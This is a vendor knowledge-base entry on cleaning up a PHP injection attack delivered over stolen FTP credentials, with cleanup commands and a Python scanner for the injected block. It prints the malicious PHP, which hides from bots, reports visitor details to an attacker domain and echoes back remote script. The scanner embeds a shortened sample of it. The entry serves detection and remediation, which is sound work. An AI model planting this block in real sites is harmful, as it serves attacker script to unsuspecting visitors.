
KB: 21012014-001: Fixing webhosting php-hash-update attack

Symptom

Core-Admin has reported unauthorized changes to your hosting files and, taking a look at them, you find that they were updated with something similar to:

<?php
#41f893#
// The two "#41f893#" lines are PHP comments: they only mark the start and end of the injected block.
error_reporting(0); ini_set('display_errors',0); $wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];
// Only fires for browser-looking user agents (Gecko/MSIE) and skips anything with "bot" in it, so crawlers and scanners never see the payload.
if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) && !preg_match ('/bot/i', $wp_wefl08872))){
// The attacker's URL is built from concatenated fragments; the visitor's IP, the site host and the user agent are reported to it.
$wp_wefl0908872="http://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_wefl08872);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}
// Whatever the remote server answered is echoed into the page if it looks like a "<script" tag.
if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }
#/41f893#
?>

Affected releases

All

Background

This attack is carried out through the FTP server: the attacker logs in with a valid account, downloads the original file and uploads it again with the block above added. Only that block is added; the rest of the file is left as it was, so the site keeps behaving normally and the change is easy to miss.

The attack is possible because the FTP password was stolen, either from a compromised computer infected with malware that harvests passwords stored at well-known locations (FTP client configuration files, for instance), or because an FTP session was opened with that password over an insecure connection (such as a public Wi-Fi), where plain FTP sends the credentials in clear text.

Solution

You have to find which files were modified and remove the added content. You must also reset the password of every FTP account that was used to carry out the attack. Fortunately, Core-Admin already includes an application that automates both tasks.

Follow these instructions to clean up the files and reset all affected FTP accounts:

  1. Run the following command as root in a server’s shell:
    >> crad-find-and-fix-phphash-attack.pyc
  2. Once finished, it reports which files were modified and which FTP accounts were compromised. Now run the tool again, asking it to fix them:
    >> crad-find-and-fix-phphash-attack.pyc --clean --change-ftp-accounts
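To make the detection and cleanup step concrete, here is an added example written for this entry; it is not Core-Admin's crad-find-and-fix-phphash-attack tool. It walks a web root, reports every PHP file carrying a hash-delimited block of the shape shown above (`<?php`, `#tag#`, payload, `#/tag#`, `?>`) and strips that block in place while keeping a backup of the original. The function names (`scan_tree`, `clean_tree`), the backup suffix, the assumption that the tag is a short hex string repeated at both ends, and the embedded sample file are all this example's own; resetting the FTP passwords still has to be done in Core-Admin.

```python
"""Find and strip the hash-delimited "php-hash-update" block from a web root.

Example code added to this KB entry; it is not Core-Admin's
crad-find-and-fix-phphash-attack tool.  Assumptions: the injected block keeps
the shape shown above ("<?php", "#<hex tag>#", payload, "#/<same tag>#", "?>"),
and cleanup means removing exactly that block.  FTP passwords are not touched.
"""
import re
import sys
import tempfile
from pathlib import Path

# Assumption: the tag is a short hex string and is identical at both ends,
# as in the "#41f893#" / "#/41f893#" sample; the backreference ties them.
INJECTED_BLOCK = re.compile(
    rb"<\?php\s*#(?P<tag>[0-9a-fA-F]{4,12})#\s*(?P<body>.*?)#/(?P=tag)#\s*\?>\s*",
    re.DOTALL,
)

# Fragments of the payload shown in this entry; used only to flag whether a
# block looks like the known malware, not to decide whether it is removed.
PAYLOAD_HINTS = (b"HTTP_USER_AGENT", b"curl_init", b"error_reporting(0)")

# Constructed sample: a shortened copy of the block above followed by the
# site's own one-line index.php content.
SAMPLE_INFECTED = (
    b"<?php\n#41f893#\n"
    b"error_reporting(0); ini_set('display_errors',0); "
    b"$wp_wefl08872 = @$_SERVER['HTTP_USER_AGENT'];\n"
    b"if (( preg_match ('/Gecko|MSIE/i', $wp_wefl08872) "
    b"&& !preg_match ('/bot/i', $wp_wefl08872))){\n"
    b"$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_wefl0908872);\n"
    b"curl_setopt ($ch, CURLOPT_TIMEOUT, 6); $wp_08872wefl = curl_exec ($ch); curl_close($ch);}\n"
    b"if ( substr($wp_08872wefl,1,3) === 'scr' ){ echo $wp_08872wefl; }\n"
    b"#/41f893#\n?>\n"
    b"<?php echo 'hello'; ?>\n"
)
SAMPLE_CLEAN = b"<?php echo 'hello'; ?>\n"


def find_injected_blocks(data):
    """Return (tag, start, end, looks_like_known_payload) for each block in data."""
    hits = []
    for m in INJECTED_BLOCK.finditer(data):
        known = all(hint in m.group("body") for hint in PAYLOAD_HINTS)
        hits.append((m.group("tag").decode(), m.start(), m.end(), known))
    return hits


def strip_injected_blocks(data):
    """Return (cleaned_bytes, removed_tags); everything outside the block is kept."""
    tags = [hit[0] for hit in find_injected_blocks(data)]
    return INJECTED_BLOCK.sub(b"", data), tags


def scan_tree(root, suffixes=(".php", ".phtml", ".inc")):
    """Map every affected file under root to the list of tags found in it."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_injected_blocks(path.read_bytes())
            if hits:
                report[path] = [hit[0] for hit in hits]
    return report


def clean_tree(root, backup_suffix=".phphash.bak"):
    """Strip the blocks in place, keeping a copy of each original beside it."""
    cleaned = []
    for path in scan_tree(root):
        original = path.read_bytes()
        fixed, _ = strip_injected_blocks(original)
        path.with_name(path.name + backup_suffix).write_bytes(original)
        path.write_bytes(fixed)
        cleaned.append(path)
    return cleaned


def self_check():
    """Exercise scan and clean on a throwaway directory holding the sample."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_bytes(SAMPLE_INFECTED)
        (root / "ok.php").write_bytes(b"<?php echo 'untouched'; ?>\n")
        before = {p.name: tags for p, tags in scan_tree(root).items()}
        cleaned = [p.name for p in clean_tree(root)]
        after = (root / "index.php").read_bytes()
        backup = (root / "index.php.phphash.bak").read_bytes()
        return before, cleaned, after, backup == SAMPLE_INFECTED


if __name__ == "__main__":
    # Usage: python phphash_clean.py /var/www/site [--clean]
    args = [a for a in sys.argv[1:] if not a.startswith("--")]
    root = args[0] if args else "."
    for path, tags in scan_tree(root).items():
        print(f"{path}: injected block(s) {', '.join(tags)}")
    if "--clean" in sys.argv:
        for path in clean_tree(root):
            print(f"cleaned {path}")
```

Run it first without `--clean` to get the report, compare a couple of the affected files against a known-good copy, and only then rewrite them. Every FTP account that can write to the reported paths should be treated as compromised, whichever account the logs show, since the scan only tells you where the block landed, not who put it there.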

Posted in: KB, Security
